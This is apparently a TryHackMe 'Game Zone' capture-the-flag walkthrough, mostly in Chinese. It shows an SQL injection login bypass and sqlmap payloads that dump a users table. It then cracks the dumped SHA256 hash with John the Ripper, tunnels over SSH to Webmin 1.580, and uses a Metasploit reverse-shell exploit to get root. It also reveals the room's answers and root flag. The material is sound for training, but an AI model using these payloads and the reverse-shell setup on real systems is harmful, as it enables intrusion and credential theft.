【THM】Game Zone-Practice

这个房间将介绍SQLi(手动和通过SQLMap利用这个漏洞),破解用户哈希密码,使用SSH隧道来揭示隐藏的服务,以及使用metasploit有效负载来获得root权限。

Task 1 Deploy the vulnerable machine

论坛上拿着狙击手的大型卡通头像叫什么名字?

image-20240118103321299

agent 47

Task 2 Obtain access via SQLi

在此任务中,您将了解有关 SQL(结构化查询语言)的更多信息,以及如何潜在地操作查询以与数据库进行通信。

SQL 是一种用于在数据库中存储、编辑和检索数据的标准语言。查询可以如下所示:

1
SELECT * FROM users WHERE username = :username AND password := password

在我们的GameZone机器中,当您尝试登录时,它将从您的用户名和密码中获取您输入的值,然后将它们直接插入到上面的查询中。如果查询找到数据,则允许你登录,否则将显示错误消息。

这是一个潜在的漏洞位置,因为您可以输入用户名作为另一个 SQL 查询。这将进行查询写入、放置和执行。

如果我们的用户名是 admin,密码是:or 1=1 #它会将其插入到查询中并验证我们的会话。

现在在 Web 服务器上执行的 SQL 查询如下所示:

1
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 #

我们输入的额外 SQL 作为密码已更改上述查询以中断初始查询并继续(使用管理员用户)如果为 1==1,则注释查询的其余部分以阻止其中断。

GameZone数据库中没有管理员用户,但是您仍然可以使用我们在上一个问题中使用的输入密码数据登录,而无需知道任何凭据。

Use ‘ or 1=1 – - as your username and leave the password blank.

登录后,您会被重定向到哪个页面?

image-20240118104244006

image-20240118104254576

When you’ve logged in, what page do you get redirected to?

会被重定向到portal.php

Task 3 Using SQLMap

image-20240118105031187

1
2
3
4
sqlmap -r request.txt --dbms=mysql --dump
-r 使用您之前保存的截获请求
--dbms 告诉 SQLMap 它是什么类型的数据库管理系统
--dump 尝试输出整个数据库

最终结果如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
---
Parameter: searchitem (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: searchitem=-2609' OR 1334=1334#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchitem=1' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(2371=2371,1))),0x7178717071),2371)-- bUnX

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchitem=1' AND (SELECT 7186 FROM (SELECT(SLEEP(5)))naeg)-- Ohyx

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: searchitem=1' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x70666c71744e687949777748634848576b6669636b486e4a7776646b664e426d557559564f4f4f48,0x7178717071),NULL#
---
1
2
3
4
5
6
7
8
9
10
11
12
Database: db
Table: post
[5 entries]
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | name                           | description                                                                                                                                                                                            |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1  | Mortal Kombat 11               | Its a rare fighting game that hits just about every note as strongly as Mortal Kombat 11 does. Everything from its methodical and deep combat.                                                         |
| 2  | Marvel Ultimate Alliance 3     | Switch owners will find plenty of content to chew through, particularly with friends, and while it may be the gaming equivalent to a Hulk Smash, that isnt to say that it isnt a rollicking good time. |
| 3  | SWBF2 2005                     | Best game ever                                                                                                                                                                                         |
| 4  | Hitman 2                       | Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing.                                          |
| 5  | Call of Duty: Modern Warfare 2 | When you look at the total package, Call of Duty: Modern Warfare 2 is hands-down one of the best first-person shooters out there, and a truly amazing offering across any system.                      |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1
2
3
4
5
6
7
8
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd                                                              | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
+------------------------------------------------------------------+----------+

Task 4 Cracking a password with JohnTheRipper

开膛手约翰 (JTR) 是一种快速、免费且开源的密码破解程序,这个工具预装在所有 Kali Linux 机器上。

我们将使用JTR程序来破解我们之前获得的哈希密码值, JohnTheRipper 已有 15 年历史,当然还有一些其他密码破解程序例如 HashCat等。

JohnTheRipper程序的工作原理是先获取一个密码单词表,然后用指定的hash算法对其进行散列处理,再将其与目标散列密码(hash密码值)进行比较,如果两个散列密码相同,则表示已找到目标散列密码所对应的明文密码–即破解成功。因为我们不能直接反转目标散列值来得到明文密码,所以我们需要通过比较散列值来完成对目标hash值的猜解过程。

john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt –format=Raw-SHA256

hash.txt - 包含您的哈希列表(在您的情况下,它只有 1 个哈希)
–wordlist - 是用于查找去哈希值的单词列表
–format - 是使用的哈希算法。在我们的例子中,它使用 SHA256 进行哈希处理。

What is the de-hashed password?

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 128/128 AVX 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124    (?)     
1g 0:00:00:00 DONE (2024-01-17 21:55) 6.250g/s 18227Kp/s 18227Kc/s 18227KC/s vimivi..veluca
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.

videogamer124

1
ssh agent47@10.10.185.223

Task 5 Exposing services with reverse SSH tunnels

cYZsC8p

反向 SSH 端口转发指定将远程服务器主机上的给定端口转发到本地端的给定主机和端口。

-L is a local tunnel (YOU <– CLIENT). If a site was blocked, you can forward the traffic to a server you own and view it. For example, if imgur was blocked at work, you can do ssh -L 9000:imgur.com:80 user@example.com. Going to localhost:9000 on your machine, will load imgur traffic using your other server.

-R is a remote tunnel (YOU –> CLIENT). You forward your traffic to the other server for others to view. Similar to the example above, but in reverse.

我们将使用一个名为 ss 的工具来调查在主机上运行的套接字。

如果我们运行 ss -tulpt,它会告诉我们正在运行哪些套接字连接

Argument Description
-t Display TCP sockets
-u Display UDP sockets
-l Displays only listening sockets
-p Shows the process using the socket
-n Doesn’t resolve service names

在上一小节中我们已经使用ssh连接到目标机器,所以我们可以通过ssh界面在目标机上运行ss -tulpn命令。

1
2
3
4
5
6
7
8
9
agent47@gamezone:~$ ss -tulpn
Netid  State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              
udp    UNCONN     0      0         *:10000                 *:*                  
udp    UNCONN     0      0         *:68                    *:*                  
tcp    LISTEN     0      80     127.0.0.1:3306                  *:*                  
tcp    LISTEN     0      128       *:10000                 *:*                  
tcp    LISTEN     0      128       *:22                    *:*                  
tcp    LISTEN     0      128      :::80                   :::*                  
tcp    LISTEN     0      128      :::22                   :::*                  
1
2
3
4
5
6
7
8
9
10
agent47@gamezone:~$ netstat -tnlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -

我们可以看到,在端口 10000 上运行的服务通过外部的防火墙规则被阻止(我们可以从 IPtable 列表中看到这一点)。但是,使用SSH隧道,我们可以(本地)向我们公开端口!

在本地计算机上,运行 ssh -L 10000:localhost:10000 @

1
ssh -L 10000:localhost:10000 agent47@10.10.185.223

完成后,在浏览器中键入“localhost:10000”,即可访问新公开的 Web 服务器。

image-20240118110646909

image-20240118110714833

What is the name of the exposed CMS?

webmin

What is the CMS version?

1.580

Task 6 Privilege Escalation with Metasploit

image-20240118111015844

1
set payload cmd/unix/reversea
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > options

Module options (exploit/unix/webapp/webmin_show_cgi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  videogamer124    yes       Webmin Password
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS    127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
                                        s/using-metasploit.html
   RPORT     10000            yes       The target port (TCP)
   SSL       false            yes       Use SSL
   USERNAME  agent47          yes       Webmin Username
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.11.63.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin 1.580



View the full module info with the info, or info -d command.
1
2
3
python -c 'import pty; pty.spawn("/bin/bash")'
cat /root/root.txt
a4b945830144bdd71908d12d902adeee